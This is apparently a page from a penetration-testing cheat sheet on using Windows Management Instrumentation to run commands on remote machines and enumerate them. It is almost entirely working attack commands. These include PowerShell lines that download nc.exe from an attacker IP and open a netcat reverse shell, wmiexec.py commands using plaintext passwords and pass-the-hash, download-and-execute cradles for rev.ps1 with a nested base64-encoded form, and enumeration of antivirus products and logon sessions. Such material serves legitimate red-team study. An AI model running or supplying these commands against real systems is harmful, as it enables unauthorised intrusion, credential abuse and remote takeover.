WMI

Windows Management Instrumentation

Perform ICMP checks remotely using Win32_PingStatus and wmiquery.py:

$ cat ping.wmi
SELECT StatusCode, ResponseTime FROM Win32_PingStatus WHERE Address='1.1'
$ wmiquery.py -k -no-pass SRV01.megacorp.local -file ping.wmi | grep '^ |' -A1

PowerShell

Basic command to check if we have privileges to execute WMI:

PS > Get-WmiObject -Credential $cred -ComputerName PC01 -Namespace "root" -class "__Namespace" | Select Name

Execute commands:

PS > Invoke-WmiMethod -Credential $cred -ComputerName PC01 win32_process -Name Create -ArgumentList ("powershell (New-Object Net.WebClient).DownloadFile('http://10.10.13.37/nc.exe', 'C:\Users\bob\music\nc.exe')")
PS > Invoke-WmiMethod -Credential $cred -ComputerName PC01 win32_process -Name Create -ArgumentList ("C:\Users\bob\music\nc.exe 10.10.13.37 1337 -e powershell")

WMI Enumeration

Invoke-LocalWMIEnum.ps1

Get-WmiObject -Class Win32_ComputerSystem | select BootupState,UserName,TotalPhysicalMemory,SystemType,SystemFamily,Domain,DNSHostName,OEMStringArray | ft -AutoSize
Get-WmiObject -Class Win32_OperatingSystem | fl *
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | select PSComputerName,DisplayName,PathToSignedProductExe,PathToSignedReportingExe,ProductState,Timestamp | ft -AutoSize
Get-WmiObject Win32_Service | select Name,State,StartName,PathName | ? {$_.State -like "Running"} | findstr /vi "C:\Windows" | ft -AutoSize
Get-WmiObject -Class Win32_LoggedOnUser | select Antecedent,Dependent,PSComputerName | ft -AutoSize
Get-WmiObject -Class Win32_LogonSession | select AuthenticationPackage,LogonID,StartTime,Scope | ft -AutoSize
Get-WmiObject -Class Win32_QuickFixEngineering | select PSComputerName,Description,HotFixID,InstalledBy,InstalledOn | ft -AutoSize
Get-WmiObject -Class Win32_Share | select Type,Name,AllowMaximum,Description,Scope | ft -AutoSize
Get-WmiObject -Class Win32_IP4RouteTable | select PSComputerName,Caption,Mask,Metric1,Protocol | ft -AutoSize
Get-WmiObject -Class Win32_UserAccount | ft -AutoSize
Get-WmiObject -Class Win32_Group | ft -AutoSize

MSFT_MTProcess

Tools

wmiexec.py

$ wmiexec.py -codec cp866 snovvcrash:'Passw0rd!'@192.168.1.11
$ wmiexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 [email protected]

Get a PowerShell reverse-shell:

$ sudo python3 -m http.server 80
$ sudo rlwrap nc -lvnp 443
$ wmiexec.py -silentcommand -nooutput snovvcrash:'Passw0rd!'@192.168.1.11 'powershell iEx (iWr "http://10.10.13.37/rev.ps1")'

When loading the cradle from a semi-interactive shell, you can combine with Invoke-WmiMethod to spawn a new PowerShell process:

wmiexec.py -silentcommand -nooutput snovvcrash:'Passw0rd!'@192.168.1.11 "powershell -enc $(echo -n 'Invoke-WmiMethod Win32_Process -Name Create -ArgumentList ("powershell -enc '`echo -n 'IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/rev.ps1")' | iconv -t UTF-16LE | base64 -w0`'")' | iconv -t UTF-16LE | base64 -w0)"

SharpWMI

https://github.com/GhostPack/SharpWMI

PS > .\SharpWMI.exe action=exec [username=MEGACORP\snovvcrash] [passw0rd=Passw0rd!] computername=PC01 command="powershell -enc <BASE64_CMD>"

Last updated 3 months ago